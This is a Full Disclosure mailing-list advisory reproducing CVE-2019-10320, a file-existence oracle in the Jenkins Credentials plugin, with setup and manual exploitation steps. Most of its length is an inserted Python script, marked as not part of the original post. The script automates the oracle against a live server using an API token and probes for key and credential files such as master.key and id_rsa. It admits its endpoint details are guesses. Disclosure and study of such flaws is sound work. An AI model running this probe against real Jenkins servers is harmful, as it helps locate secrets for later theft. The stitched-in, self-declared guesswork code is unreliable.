Message-ID: <CAAyEnSOJMdPPUtU=FVx4VPdpQn9JrmBbnmwRG=QmhSTtvTQ+ww@mail.gmail.com>
Date: Thu, 23 May 2019 23:34:30 -0400
From: Nightwatch Cybersecurity Research <research@...htwatchcybersecurity.com>
To: fulldisclosure@...lists.org
Subject: [FD] Exploring the File System via Jenkins Credentials Plugin Vulnerability – CVE-2019-10320

[Original blog post here:
https://wwws.nightwatchcybersecurity.com/2019/05/23/exploring-the-file-system-via-jenkins-credentials-plugin-vulnerability-cve-2019-10320/]

SUMMARY

The recently fixed vulnerability in the Jenkins Credentials plugin
(fixed in v2.1.19; v2.1.18 and earlier are affected) allowed users with
certain permissions to confirm the existence of an arbitrary file on the
Jenkins master's file system. While this does not allow an attacker to
view the file content, the ability to obtain information about the file
system can be leveraged for other attacks. In this post we will explain
how to reproduce this vulnerability.

It is also possible to load credentials from a valid PKCS#12 file on
the Jenkins server and obtain access to the contents of those
credentials via a job. That may be addressed in a future blog post.

PLEASE NOTE: This is only exploitable by users that have sufficient
access to the Jenkins server to add or update credentials. Anonymous
users usually do not have that level of access.

PREREQUISITES

You will need to download, install and initialize Jenkins following
these instructions ("https://jenkins.io/doc/book/installing/"). DO NOT
install any plugins during the installation process. When done, you
should be able to log in to Jenkins via the following URL:
"http://localhost:8080/".

INSTALLING THE VULNERABLE PLUGIN

1. Download the vulnerable plugin (v2.1.18) from the Jenkins update
site as an HPI file
("https://updates.jenkins.io/download/plugins/credentials/").

2. Go to the Jenkins plugin manager, and click the advanced tab
(“http://localhost:8080/pluginManager/advanced“) to get to the manual
plugin installation page. Select the HPI file downloaded in the
previous step and install it. Restart the Jenkins server
(“http://localhost:8080/restart“) after the plugin has been installed.

3. Log in to the Jenkins management page
("http://localhost:8080/manage") and open the plugin manager
("http://localhost:8080/pluginManager/") to confirm that the
vulnerable plugin version (2.1.18) has been installed.

GETTING TO THE VULNERABLE PAGE

1. Log in to Jenkins, then go to "Credentials", "System", "Global
Credentials". Click the new option "Add Credentials" that appears on
the left side. The user you are logged in as MUST have sufficient
permissions to add or update credentials. You can also reach this page
by going directly to
"http://localhost:8080/credentials/store/system/domain/_/newCredentials".

2. In the “Kind” drop down box select “Certificate”, and from the two
radio buttons select “From a PKCS#12 file on Jenkins master”.

EXPLOITATION

Put a path in the "file" box and click anywhere else on the page so
that the field loses focus and the form validation runs. You will get
the error message "The file xxxx doesn't exists" if the file is not
present, OR "Could not load keystore" if the file does exist (but is
not a loadable PKCS#12 keystore). The difference between the two error
messages is a file-existence oracle: an attacker can submit one path
after another and confirm whether specific files exist on the master.
While file content cannot be viewed (unless the file is a valid PKCS#12
keystore), the attacker can use this technique to help advance other
attacks, for example by confirming the location of configuration files
or keys before attempting to read them another way.
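The steps above work the oracle by hand through the browser. The script below, an added example that is not part of the original post or the Jenkins project's code, does the same thing programmatically: it submits each candidate path to the form-validation handler and classifies the response using the two error strings quoted above. Everything other than those two strings is an assumption: the validation URL (Jenkins form validation generally lives at /descriptorByName/<descriptor class>/check<Field>, and the class and field name used here are recalled from the plugin source and may differ between versions), the /crumbIssuer/api/json CSRF endpoint, basic auth with an API token, and the candidate path list and sample responses, which are constructed for illustration.

```python
"""
Added example (not from the original post or the Jenkins project): drive the
CVE-2019-10320 file-existence oracle as a script and classify the two error
messages the advisory quotes.

ASSUMPTIONS (not facts from the page): CHECK_PATH, the crumb endpoint, basic
auth with an API token, CANDIDATE_PATHS and SAMPLE_RESPONSES.
"""
import base64
import html
import json
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable

MSG_MISSING = "doesn't exists"           # quoted on the page: path is absent
MSG_PRESENT = "Could not load keystore"  # quoted on the page: path exists

# ASSUMPTION: descriptor class and field name for the
# "From a PKCS#12 file on Jenkins master" option; verify against your version.
CHECK_PATH = ("/descriptorByName/com.cloudbees.plugins.credentials.impl."
              "CertificateCredentialsImpl$FileOnMasterKeyStoreSource"
              "/checkKeyStoreFile")

CANDIDATE_PATHS = [  # constructed wordlist; adjust for the target OS and layout
    "/etc/passwd",
    "/var/lib/jenkins/secrets/master.key",
    "/var/lib/jenkins/config.xml",
    "/root/.ssh/id_rsa",
    "/this/path/should/not/exist",
]


def classify(body: str) -> str:
    """Map a validation response body to 'missing', 'present' or 'unknown'.

    The body is rendered HTML, so unescape it first: the apostrophe in
    "doesn't" may arrive as &#039;. Anything that matches neither quoted
    message is reported as 'unknown' rather than guessed.
    """
    text = html.unescape(body)
    if MSG_MISSING in text:
        return "missing"
    if MSG_PRESENT in text:
        return "present"
    return "unknown"


def probe(paths: Iterable[str], fetch: Callable[[str], str]) -> Dict[str, str]:
    """Run the oracle over `paths`; `fetch(path)` returns the response body."""
    return {p: classify(fetch(p)) for p in paths}


def jenkins_fetcher(base_url: str, user: str, api_token: str) -> Callable[[str], str]:
    """Build a fetch() that POSTs each candidate path to the validation URL.

    Needs an account that can add or update credentials (see PLEASE NOTE).
    A cookie jar is kept because newer Jenkins ties the CSRF crumb to the
    session that requested it.
    """
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
    auth = base64.b64encode(f"{user}:{api_token}".encode()).decode()
    headers = {"Authorization": f"Basic {auth}"}
    # ASSUMPTION: /crumbIssuer/api/json returns {"crumbRequestField", "crumb"}
    req = urllib.request.Request(base_url + "/crumbIssuer/api/json", headers=headers)
    with opener.open(req, timeout=10) as resp:
        crumb = json.load(resp)
    headers[crumb["crumbRequestField"]] = crumb["crumb"]

    def fetch(path: str) -> str:
        data = urllib.parse.urlencode({"value": path}).encode()
        req = urllib.request.Request(base_url + CHECK_PATH, data=data, headers=headers)
        with opener.open(req, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")

    return fetch


# Constructed stand-in for a vulnerable server so the script runs offline.
SAMPLE_RESPONSES = {
    "/etc/passwd": '<div class="error">Could not load keystore</div>',
    "/var/lib/jenkins/secrets/master.key": '<div class="error">Could not load keystore</div>',
    "/var/lib/jenkins/config.xml": '<div class="error">Could not load keystore</div>',
    "/root/.ssh/id_rsa": '<div class="error">The file /root/.ssh/id_rsa doesn&#039;t exists</div>',
    "/this/path/should/not/exist": '<div class="error">The file /this/path/should/not/exist doesn&#039;t exists</div>',
}


def offline_fetch(path: str) -> str:
    """Offline fetch() backed by the constructed SAMPLE_RESPONSES."""
    return SAMPLE_RESPONSES.get(path, "<div/>")


if __name__ == "__main__":
    import sys
    # usage: python3 probe.py http://localhost:8080 <user> <api-token>
    fetch = jenkins_fetcher(*sys.argv[1:4]) if len(sys.argv) == 4 else offline_fetch
    for path, verdict in probe(CANDIDATE_PATHS, fetch).items():
        print(f"{verdict:8s} {path}")
```

Run without arguments it exercises the classifier against the constructed responses; with a base URL, user and API token it talks to a real instance. If every response comes back as "unknown", the validation URL or field name assumption is wrong for that plugin version, or the account lacks the permission to add credentials; check the browser's network tab while triggering the validation by hand to find the actual handler.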

REFERENCES

CVE-ID: CVE-2019-10320
Vendor advisory: https://jenkins.io/security/advisory/2019-05-21/#SECURITY-1322

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/